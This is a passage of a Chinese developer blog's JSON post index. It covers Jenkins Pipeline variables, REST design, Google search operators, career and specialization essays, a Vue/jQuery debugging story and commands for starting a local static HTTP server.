That allows you to write, for example:\nproperties([parameters([string(name: \u0026lsquo;BRANCH\u0026rsquo;, defaultValue: \u0026lsquo;master\u0026rsquo;)])])\ngit url: \u0026#39;…\u0026#39;, branch: params.BRANCH and be assured that the master branch will be checked out even in the initial build of a branch project, or if the previous build did not specify parameters or used a different parameter name.\ncurrentBuild The currentBuild variable may be used to refer to the currently running build. It has the following readable properties:\nnumber build number (integer) result typically SUCCESS, UNSTABLE, or FAILURE (may be null for an ongoing build) currentResult typically SUCCESS, UNSTABLE, or FAILURE. Will never be null. resultIsBetterOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is better than or equal to the provided result. resultIsWorseOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is worse than or equal to the provided result. 
displayName normally #123 but sometimes set to, e.g., an SCM commit identifier description additional information about the build id normally number as a string timeInMillis time since the epoch when the build was scheduled startTimeInMillis time since the epoch when the build started running duration duration of the build in milliseconds durationString a human-readable representation of the build duration previousBuild another similar object, or null nextBuild similarly absoluteUrl URL of build index page buildVariables for a non-Pipeline downstream build, offers access to a map of defined build variables; for a Pipeline downstream build, any variables set globally on env changeSets a list of changesets coming from distinct SCM checkouts; each has a kind and is a list of commits; each commit has a commitId, timestamp, msg, author, and affectedFiles each of which has an editType and path; the value will not generally be Serializable so you may only access it inside a method marked @NonCPS rawBuild a hudson.model.Run with further APIs, only for trusted libraries or administrator-approved scripts outside the sandbox; the value will not be Serializable so you may only access it inside a method marked @NonCPS Additionally, for this build only (but not for other builds), the following properties are writable: result displayName description scm Represents the SCM configuration in a multibranch project build. 
Use checkout scm to check out sources matching Jenkinsfile.You may also use this in a standalone project configured with Pipeline script from SCM, though in that case the checkout will just be of the latest revision in the branch, possibly newer than the revision from which the Pipeline script was loaded.\n参考 Global Variable Reference ","permalink":"https://wdd.js.org/posts/2019/10/ikg19e/","summary":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.\nMethods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.","title":"Jenkins 全局变量参考"},{"content":"1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipedia\nREST API 不是一个标准或者一个协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向此API发出客户端请求,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CRUD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. 
RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts. POST /users. PUT /users/123 - update a user entity with id = 123. DELETE /users/123 - delete a user with id = 123. 6. 文档 7. 版本 版本管理一般有两种\n位于url中的版本标识: http://example.com/api/v1 位于请求头中的版本标识:Accept: application/vnd.redkavasyl+json; version=2.0 8. 深入理解状态与无状态 我认为REST架构最难理解的就是状态与无状态。下面我画出两个示意图。\n图1是有状态的服务,状态存储于单个服务之中,一旦一个服务挂了,状态就没了,有状态服务很难扩展。无状态的服务,状态存储于客户端,一个请求可以被投递到任何服务端,即使一个服务挂了,也不会影响到同一个客户端发来的下一个请求。\n【图1 有状态的架构】\n【图2 无状态的架构】\neach request from client to server must contain all of the information necessary to understand the request, and cannot take advantage of any stored context on the server. Session state is therefore kept entirely on the client. rest_arch_style stateless\n每一个请求自身必须携带所有的信息,让服务端理解这个请求。举个栗子,常见的翻页操作,应该客户端告诉服务端想要看第几页的数据,而不应该让服务端记住客户端看到了第几页。\n9. 参考 A Beginner’s Tutorial for Understanding RESTful API Versioning REST Services http://ruanyifeng.com/blog/2018/10/restful-api-best-practices.html https://florimond.dev/en/posts/2018/08/restful-api-design-13-best-practices-to-make-your-users-happy/ https://docs.microsoft.com/en-us/azure/architecture/best-practices/api-design https://github.com/Microsoft/api-guidelines/blob/master/Guidelines.md https://github.com/cocoajin/http-api-design-ZH_CN https://www.cnblogs.com/welan/p/9875103.html ","permalink":"https://wdd.js.org/posts/2019/10/irl0p4/","summary":"1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipedia\nREST API 不是一个标准或者一个协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向此API发出客户端请求,则您的客户端为RESTful。\n2. 
REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CRUD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts.","title":"Restful API 架构思考"},{"content":"1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 + 包含A且必须包含B A +B A和+之间有空格 Maxwell +wills - 包含A且不包含B A -B A和-之间有空格 Maxwell -Absolom \u0026quot; \u0026quot; 完整匹配AB \u0026ldquo;AB\u0026rdquo; \u0026ldquo;Thomas Jefferson\u0026rdquo; OR 包含A或者B A OR B 或者 `A B` +-\u0026ldquo;OR 指令可以组合,完成更复杂的查询 beach -sandy +albert +nathaniel ~ 包含A, 并且包含B的近义词 A ~B github ~js .. 区间查询 AB之间 A..B china 1888..2000 * 匹配任意字符 node* java site: 站内搜索 A site:B filetype: 按照文件类型搜索 A filetype:B csta filetype:pdf 3. 关键词使用 方法 说明 示例 列举关键词 列举所有和搜索相关的关键词,并且尽量把重要的关键词排在前面。不同的关键词顺序会返回不同的结果 书法 毛笔 绘画 不要使用某些词 如代词介词语气词,如i, the, of, it, 我,吗 搜索引擎一般会直接忽略这些信息含量少的词 大小写不敏感 大写字符和小写字符在搜索引擎看来没有区别,尽量使用小写的就可以 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 Advanced Google Search Commands Google_rules_for_searching.pdf An introduction to search commands ","permalink":"https://wdd.js.org/posts/2019/10/giflpm/","summary":"1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 + 包含A且必须包含B A +B A和+之间有空格 Maxwell +wills - 包含A且不包含B A -B A和-之间有空格 Maxwell -Absolom \u0026quot; \u0026quot; 完整匹配AB \u0026ldquo;AB\u0026rdquo; \u0026ldquo;Thomas Jefferson\u0026rdquo; OR 包含A或者B A OR B 或者 `A B` +-\u0026ldquo;OR 指令可以组合,完成更复杂的查询 beach -sandy +albert +nathaniel ~ 包含A, 并且包含B的近义词 A ~B github ~js .. 
区间查询 AB之间 A..B china 1888..2000 * 匹配任意字符 node* java site: 站内搜索 A site:B filetype: 按照文件类型搜索 A filetype:B csta filetype:pdf 3.","title":"掌握谷歌搜索高级指令"},{"content":"1. 培训行业的现状和问题 进入培训班学习可能有以下两个原因:\n想转行 学校里学的东西太过时了,需要深入学习本行业的知识 培训行业的核心思想都是:如何快速的让你能够面试通过\n老师教的东西大多是一些面试必问的知识,做的项目也应该都是市面上比较火的项目。这么做的不利之处有以下几点:\n局限性:知识局限于教师的授课范围,知识面窄 扩展性:快餐式学习管饱不管消化,很多知识吸收不高,无法举一反三 系统性:没有系统的整体知识体系 所以这些因素可能会让用人不太喜欢培训出来的应聘者,而往往希望刚毕业的应届生。但是,培训行业出来的应聘者,也不乏国士无双的牛逼人物。\n2. 如何成为培训出来的牛人? 无论在哪个行业,自学都是必不可少的事情。毕业不是学习的终点,而应该是起点。你和技术牛人之间的距离或许并不遥远,可能只是一个芭蕉扇的距离。\n2.1. 读权威书籍,扎实理论基础 每个行业都有一些经历时间考验而熠熠生辉的经典书籍,例如在前端行业。我认为下面两本书是必须要读完一本的。\n基础\nJavaScript高级程序设计 JavaScript权威指南 进阶\nJavaScript语言精粹 JavaScript忍者秘籍 You Don\u0026rsquo;t Know JS JS函数式编程指南 2.2. 动手能力,闲话少说,放码过来 各种demo啊,效果啊,有时间自己都可以撸一遍,放在github上,又不收钱,还能提高动手能力。\n2.3. 数据结构 差劲的程序员操心代码,牛逼的程序员操心数据结构和它们之间的关系。 一一Linus Torvalds, Linux 创始人\n优秀的数据结构,可以节省你80%的编码时间。差劲的数据结构,你需要花大量的时间去做各种高难度动作的转换,一不小心,数据库就要累得气喘如牛,停机罢工。\n2.4. 知识积累,从博客开始 如果你已经在某个行业工作个两三年,一篇像样的博客都没有。\n那我觉得你可能是个懒人。因为几乎很少写东西。\n我觉得你可能是个自私的人。因为做计算机行业的,谁没有用过别人造的轮子。即使你没有造轮子的能力,即使你只是给出一个问题应该如何解决的思路,至少你对计算机行业也作出了你的贡献。\n2.5. 互联网的基石 TCP IP 计算机行业是分层的,就像大海一样,海面上的往往都是惊涛骇浪,暴风骤雨,各种框架层出不穷,争奇斗艳。当你深入海底,你会发现,那里是最平静的地方。而TCP IP等协议知识,就是整个互联网大航海时代的海底。互联网行业如此多娇,引无数框架竞折腰。浪潮之巅者成为行业热点,所有资源会喷薄涌入,失去优势被替代者,往往折戟沉沙铁未销。总之,越是上层,竞争越激烈,换代越快。\n但是底层的TCP/IP之类的知识,往往几十年都不会有多大的改变。而且无论你从事什么语言开发,只要你涉及到通信了,你就需要TCP/IP的知识点,如果你不清楚这些知识点,就可能随时给自己埋下定时炸弹。\n这个错误我也犯过,你可以看我的犯错记录:哑代理 - TCP链接高Recv-Q,内存泄露的罪魁祸首。\n关于TCP/IP, 推荐以下书籍\n基础\n图解TCP/IP : 第5版 图解HTTP 进阶\nHTTP权威指南 2.6. 工具的威力 你用刀,我用枪,谁说谁能打过谁。原始社会两个野蛮人相遇,块头大的,食物多,可以拥有更多的繁衍后代的权利。但是当一个野蛮人知道用刀的威力时,他就不会害怕胳膊比较粗的对手了。\n举例来说,前端开发免不了有时需要一个静态文件服务器,如果你只知道阿帕奇,那你的工具也太落后了。你可以看看这篇文章:一行命令搭建简易静态文件http服务器\n当你想要更偷懒,想要不安于现状时,你会找到更多的厉害的工具。\n2.7. 英语阅读能力 IT行业还有一个现象,就是看英文文档如喝中药一般,总是捏着鼻子也看不下去。看中文文档仿佛如喝王老吉,消火又滋润。\nIT行业至今来说,仿佛还是个舶来品。所有的最新的文档都是英文的。但是也不乏有好的中文翻译文档,但是都是需要花时间去等待。而且英文文档也随着翻译者的水平而参差不齐。\n其实我们完全没必要去害怕英文文档,其实英文文档里最常用的单词往往是很固定的。又不是什么言情小说,总是让你摸不着头脑。\n你不想看英文文档,从本质上说,还是因为你懒。\n2.8. 
文档能力 大多说程序的文档都是写给自己看的,或者说大多说的程序员的语文都是数学老师教的。这个其实很让看文档的人苦恼的。一个优秀的程序和框架,无一不是文档非常完善。因为文档的完善才能有利于文档的传播,才有利于解决问题。你的框架再牛逼,效率再如何高,没有人能看的懂,那是没用了。闭门造车永远也搞不出好东西。\n关于如何写作文档,可以参考:如何写好技术文档?\n3. 总结 开放的思维,敢于接纳一些新事物 不断学习,不舍昼夜 记笔记,写博客,要给所有的努力留下记录 ","permalink":"https://wdd.js.org/posts/2019/10/vyu2rs/","summary":"1. 培训行业的现状和问题 进入培训班学习可能有一下两个原因:\n想转行 学校里学的东西太过时了,需要深入学习本行业的知识 培训的行业的核心思想都是:如何快速的让你能够面试通过\n老师教的东西大多是一些面试必须要问的一些知识,做的项目也应该都是市面上比较火的项目。这么做的不利之处有以下几点:\n局限性:知识局限于教师的授课范围,知识面窄 扩展性:快餐式学习管饱不管消化,很多知识吸收不高,无法举一反三 系统性:没有系统的整体知识体系 所以这些因素可能会让用人不太喜欢培训出来的应聘者,而往往希望刚毕业的应届生。但是,培训行业出来的应聘者,也不乏国士无双的牛逼人物。\n2. 如何成为培训出来的牛人? 无论在哪个行业,自学都是必不可少的事情。毕业不是学习的终点,而应该是起点。你和技术牛人之间的距离或许并不遥远,可能只是一个芭蕉扇的距离。\n2.1. 读权威书籍,扎实理论基础 每个行业都有一些经历时间考验而熠熠生辉的经典数据,例如在前端行业。我认为下面两本书是必须要读完一本的。\n基础\nJavaScript高级程序设计 JavaScript权威指南 进阶\nJavaScript语言精粹 JavaScript忍者秘籍 You Don\u0026rsquo;t Know JS JS函数式编程指南 2.2. 动手能力,闲话少说,放码过来 各种demo啊,效果啊,有时间自己都可以撸一遍,放在github上,又不收钱,还能提高动手能力。\n2.3. 数据结构 差劲的程序员操心代码,牛逼的程序员操心数据结构和它们之间的关系。 一一Linus Torvalds, Linux 创始人\n优秀的数据结构,可以节省你80%的编码时间。差劲的数据结构,你需要花大量的时间去做各种高难度动作的转换,一不小心,数据库就要累的气喘如牛,停机罢工。\n2.4. 知识积累,从博客开始 如果你已经在某个行业工作个两三年,一篇像样的博客都没有。\n那我觉得你可能是个懒人。因为几乎很少写东西。\n我觉得你可以是个自私的人。因为做计算机行业的,谁没有用过别人造的轮子。即使你没有造轮子的能力,即使你给出一个问题应该如何解决的,至少你对计算机行业也作出了你的贡献。\n2.5. 互联网的基石 TCP IP 计算机行业是分层的,就像大海一样,海面上的往往都是惊涛骇浪,暴风骤雨,各种框架层出不穷,争奇斗艳。当你深入海底,你会发现,那里是最平静的地方。而TCP IP等协议知识,就是整个互联网大航海时代的海底。互联网行业如此多娇,引无数框架竞折腰。浪潮之巅者成为行业热点,所有资源会喷薄涌入,失去优势被替代者,往往折戟沉沙铁未销。总之,越是上层,竞争越激烈,换代越快。\n但是底层的TCP/IP之类的知识,往往几十年都不会有多大的改变。而且无论你从事什么语言开发,只要你涉及到通信了,你就需要TCP/IP的知识点,不过你不清楚这些知识点,你可以随时给自己埋下定时炸弹。\n这个错误我也犯过,你可以看我的犯错记录:哑代理 - TCP链接高Recv-Q,内存泄露的罪魁祸首。\n关于TCP/IP, 推荐一下书籍\n基础\n图解TCP/IP : 第5版 图解HTTP 进阶\nHTTP权威指南 2.6. 工具的威力 你用刀,我用枪,谁说谁能打过谁。原始社会两个野蛮人相遇,块头大的,食物多,可以拥有更多的繁衍后代的权利。但是当一个野蛮人知道用刀的威力时,他就不会害怕胳膊比较粗的对手了。\n举例来说,前端开发免不了有时需要一个静态文件服务器,如果你只知道阿帕奇,那你的工具也太落后了。你可以看看这篇文章:一行命令搭建简易静态文件http服务器\n当你想要更偷懒,想要不安于现状时,你会找到更多的厉害的工具。\n2.7. 
英语阅读能力 IT行业还有一个现象,就是看英文文档如喝中药一般,总是捏着鼻子也看不下去。看中文文档仿佛如喝王老吉,消火又滋润。","title":"如何成为从培训班里出来的牛人?"},{"content":"从分工到专业化 分工提高生产效率,专业化提高个人价值。很多人都认为,一旦我们进入了某一行,我们就应该在这个行业深挖到底。例如我是做前端的,我就会去学习各种前端的知识点,各种层出不穷的框架。我总是在如饥似渴的希望自己能够保持在深入学习的状态,我不想哪一天自己突然out了。\n专业化的危机在哪? 以前我在上初中的时候,就稍稍的学习了一点点ActionScript的知识。可能有些人不知道ActionScript是干嘛的,它是在flash的环境中工作的,可以在flash里做一些动画和特效之类的。那时候flash是很火的技术,几乎所有的网站都是有flash的,所以会ActionScript语言的程序员,工资都不低。\n但是,你现在还听过什么ActionScript吗? 它的宿主环境flash都已经被淘汰了,皮之不存毛将焉附。可想而知,flash的淘汰,同时也让市场淘汰了一批ActionScript的专家。\n所以,专业化并不是一个安全的道路。准确来说,世界上本来就没有安全的路。大多数人认为这条路安全,是因为他们总是以静态的眼光看这条路。说点题外话,如果你书读多了,你会发现,其实一直在你思想里的那些观念,那些故事,往往都是忽悠人的。你可以看看我的一个书单:2018年我的阅读计划。\n从企业的角度考虑,每个老板都想招在某一方面的专家。但是从个人的角度考虑,如果你在专业化的道路钻研的非常深,或许有时候你应该放慢脚步,找个长椅,坐着想一想,如果你前面马上就是死路了,你应该怎么办?\n我们应该怎么办? 世界上没有安全的路,世界上也没有一直安全的职业。一个职业的火爆,往往因为这个行业的火爆。而永远也没有永远火爆的行业,当退潮时,将会有大批的弄潮儿会搁浅,干死,窒息\u0026hellip;\u0026hellip;\n除去环境造成的扰动,人的身体也会随着年龄慢慢老化。\n你可以想象一下,当你四十多岁时。那些新来的实习生,比你要的工资低,比你更容易接受这个行业的前沿知识,比你更加能加班,比你能力更强,比你更听话。你的优势在哪里?我相信到那时候,你的领导会毫不犹豫开了你。\n在此,你要改变。我给出以下几个角度,你可以自行延伸。\n开始锻炼身体 这是一切的基石 搞一搞副业,学习一下你喜欢的东西,你可以去深入学学如何做菜,如何摄影等等 学习理财知识,这是学校从没教你的,但是却是非常重要的东西 读书,越多越好 参考文献 专业主义 日 大前研一 富爸爸穷爸爸 罗伯特·清崎 / 莎伦·莱希特 国富论 英 亚当·斯密 失控 乌合之众 法 古斯塔夫·勒庞 未来世界的幸存者 阮一峰 新生 七年就是一辈子 李笑来 ","permalink":"https://wdd.js.org/posts/2019/10/vpqfyr/","summary":"从分工到专业化 分工提高生产效率,专业化提高个人价值。很多人都认为,一旦我们进入了某一行,我们就应该在这个行业深挖到底。例如我是做前端的,我就会去学习各种前端的知识点,各种层出不穷的框架。我总是在如饥似渴的希望自己能够保持在深入学习的状态,我不想哪一天自己突然out了。\n专业化的危机在哪? 以前我在上初中的时候,就稍稍的学习了一点点ActionScript的知识。可能有些人不知道ActionScript是干嘛的,它是在flash的环境中工作的,可以在flash里做一些动画和特效之类的。那时候flash是很火的技术,几乎所有的网站都是有flash的,所以会ActionScript语言的程序员,工资都不低。\n但是,你现在还听过什么ActionScript吗? 它的宿主环境flash都已经被淘汰了,皮之不存毛将焉附。可想而知,flash的淘汰,同时也让市场淘汰了一批ActionScript的专家。\n所以,专业化并不是一个安全的道路。准确来说,世界上本来就没有安全的路。大多数人认为这条路安全,是因为他们总是以静态的眼光看这条路。说点题外话,如果你书读多了,你会发现,其实一直在你思想里的那些观念,那些故事,往往都是忽悠人的。你可以看看我的一个书单:2018年我的阅读计划。\n从企业的角度考虑,每个老板都想招在某一方面的专家。但是从个人的角度考虑,如果你在专业化的道路钻研的非常深,或许有时候你应该放慢脚步,找个长椅,坐着想一想,如果你前面马上就是死路了,你应该怎么办?\n我们应该怎么办? 
世界上没有安全的路,世界上也没有一直安全的职业。一个职业的火爆,往往因为这个行业的火爆。而永远也没有永远火爆的行业,当退潮时,将会有大批的弄潮儿会搁浅,干死,窒息\u0026hellip;\u0026hellip;\n除去环境造成的扰动,人的身体也会随着年龄会慢慢老化。\n你可以想象一下,当你四十多岁时。那些新来的实习生,比你要的工资低,比你更容易接受这个行业的前沿知识,比你更加能加班,比你能力更强时,比你更听话时。你的优势在哪里?我相信到那时候,你的领导会毫不犹豫开了你。\n在此,你要改变。我给出以下几个角度,你可以自行延伸。\n开始锻炼身体 这是一切的基石 搞一搞副业,学习一下你喜欢的东西,你可以去深入学学如何做菜,如何摄影等等 学习理财知识,这是学校从没教你的,但是却是非常重要的东西 读书,越多越好 参考文献 专业主义 日 大前研一 富爸爸穷爸爸 罗伯特·清崎 / 莎伦·莱希特 国富论 英 亚当·斯密 失控 乌合之众 法 古斯塔夫·勒庞 未来世界的幸存者 阮一峰 新生 七年就是一辈子 李笑来 ","title":"你不知道的专业化道路"},{"content":"1. 问题1:chosen插件无法显示图标 问题现象在我本地调试的时候,我使用了一个多选下拉框的插件,就是chosen, 不知道为什么,这个多选框上面的图标不见了。我找了半天没有找到原因,然后我把我的机器的内网地址给我同事,让他访问我机器,当它访问到这个页面时。他的电脑上居然显示出了这个下拉框的图标。\n这是什么鬼?, 为什么同样的代码,在我的电脑上显示不出图标,但是在他的电脑上可以显示。有句名言说的好:没有什么bug是一遍调试解决不了的,如果有,就再仔细调试一遍。于是我就再次调试一遍。\n我发现了一些第一遍没有注意到的东西媒体查询,就是在css里有这样的语句:\n@media 从这里作为切入口,我发现:媒体查询的类会覆盖它原生的类的属性\n由于我的电脑视网膜屏幕,分辨率比较高,触发了媒体查询,这就导致了媒体查询的类覆盖了原生的类。而覆盖后的类,使用了chosen-sprite@2x.png作为图标的背景图片。但是这个图片并没有被放在这个插件的目录下,有的只有chosen-sprite.png这个图片。在一般情况下,都是用chosen-sprite.png作为背景图片的。这就解释了:为什么同事的电脑上出现了图标,但是我的电脑上没有出现这个图标。\n总结: 如果你要使用一个插件,你最好把这个插件的所有文件都放在同一个目录下。而不要只放一些你认为有用的文件。最后:媒体查询的相关知识也是必要的。\n2. 
问题2:jQuery 与 Vue之间的暧昧 jQuery流派代表着直接操纵DOM的流派,Vue流派代表着操纵数据的流派。\n如果在项目里,你使用了一些jQuery插件,也使用了Vue,这就可能导致一些问题。\n举个例子:\n\u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/vue/2.4.4/vue.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; 姓名 \u0026lt;input type=\u0026#34;text\u0026#34; v-model=\u0026#34;userName\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; 年龄 \u0026lt;input type=\u0026#34;text\u0026#34; id=\u0026#34;userAge\u0026#34; v-model=\u0026#34;userAge\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; new Vue({ el: \u0026#39;#app\u0026#39;, data: { userName: \u0026#39;\u0026#39;, userAge: 12 } }); $(\u0026#39;#userAge\u0026#39;).val(14); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 在页面刚打开时:姓名输入框是空的,年龄输入框是14。但是一旦你在姓名输入框输入任何字符时,年龄输入框的值就会变成12。\n如果你仔细看过Vue官方文档,你会很容易定位问题所在。\nv-model 会忽略所有表单元素的 value、checked、selected 特性的初始值。因为它会选择 Vue 实例数据来作为具体的值。你应该通过 JavaScript 在组件的 data 选项中声明初始值。---Vue官方文档 你可以用 v-model 指令在表单控件元素上创建双向数据绑定。它会根据控件类型自动选取正确的方法来更新元素。尽管有些神奇,但 v-model 本质上不过是语法糖,它负责监听用户的输入事件以更新数据,并特别处理一些极端的例子。\n当userAge被jQuery改成14时,Vue实例中的userAge任然是12。当你输入userName时,Vue发现数据改变,触发虚拟DOM的重新渲染,同时也将userAge渲染成了12。\n总结:如果你在Vue项目中逼不得已使用jQuery, 你要知道这会导致哪些常见的问题,以及解决思路。\n3. 最后 我苦苦寻找诡异的bug原因,其实是我的无知。\n","permalink":"https://wdd.js.org/posts/2019/10/qmgxqm/","summary":"1. 
问题1:chosen插件无法显示图标 问题现象在我本地调试的时候,我使用了一个多选下拉框的插件,就是chosen, 不知道为什么,这个多选框上面的图标不见了。我找了半天没有找到原因,然后我把我的机器的内网地址给我同事,让他访问我机器,当它访问到这个页面时。他的电脑上居然显示出了这个下拉框的图标。\n这是什么鬼?, 为什么同样的代码,在我的电脑上显示不出图标,但是在他的电脑上可以显示。有句名言说的好:没有什么bug是一遍调试解决不了的,如果有,就再仔细调试一遍。于是我就再次调试一遍。\n我发现了一些第一遍没有注意到的东西媒体查询,就是在css里有这样的语句:\n@media 从这里作为切入口,我发现:媒体查询的类会覆盖它原生的类的属性\n由于我的电脑视网膜屏幕,分辨率比较高,触发了媒体查询,这就导致了媒体查询的类覆盖了原生的类。而覆盖后的类,使用了chosen-sprite@2x.png作为图标的背景图片。但是这个图片并没有被放在这个插件的目录下,有的只有chosen-sprite.png这个图片。在一般情况下,都是用chosen-sprite.png作为背景图片的。这就解释了:为什么同事的电脑上出现了图标,但是我的电脑上没有出现这个图标。\n总结: 如果你要使用一个插件,你最好把这个插件的所有文件都放在同一个目录下。而不要只放一些你认为有用的文件。最后:媒体查询的相关知识也是必要的。\n2. 问题2:jQuery 与 Vue之间的暧昧 jQuery流派代表着直接操纵DOM的流派,Vue流派代表着操纵数据的流派。\n如果在项目里,你使用了一些jQuery插件,也使用了Vue,这就可能导致一些问题。\n举个例子:\n\u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/vue/2.4.4/vue.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; 姓名 \u0026lt;input type=\u0026#34;text\u0026#34; v-model=\u0026#34;userName\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; 年龄 \u0026lt;input type=\u0026#34;text\u0026#34; id=\u0026#34;userAge\u0026#34; v-model=\u0026#34;userAge\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; new Vue({ el: \u0026#39;#app\u0026#39;, data: { userName: \u0026#39;\u0026#39;, userAge: 12 } }); $(\u0026#39;#userAge\u0026#39;).val(14); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 在页面刚打开时:姓名输入框是空的,年龄输入框是14。但是一旦你在姓名输入框输入任何字符时,年龄输入框的值就会变成12。\n如果你仔细看过Vue官方文档,你会很容易定位问题所在。\nv-model 会忽略所有表单元素的 value、checked、selected 特性的初始值。因为它会选择 Vue 实例数据来作为具体的值。你应该通过 JavaScript 在组件的 data 选项中声明初始值。---Vue官方文档 你可以用 v-model 
指令在表单控件元素上创建双向数据绑定。它会根据控件类型自动选取正确的方法来更新元素。尽管有些神奇,但 v-model 本质上不过是语法糖,它负责监听用户的输入事件以更新数据,并特别处理一些极端的例子。","title":"我苦苦寻找诡异的bug原因,其实是我的无知"},{"content":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET /favicon.ico HTTP/1.1\u0026#34; 404 - 2. 基于nodejs 首先你要安装nodejs\n2.1. http-server // 安装 npm install http-server -g // 用法 http-server [path] [options] 2.2. serve // 安装 npm install -g serve // 用法 serve [options] \u0026lt;path\u0026gt; 2.3. webpack-dev-server // 安装 npm install webpack-dev-server -g // 用法 webpack-dev-server 2.4. anywhere // 安装 npm install -g anywhere // 用法 anywhere 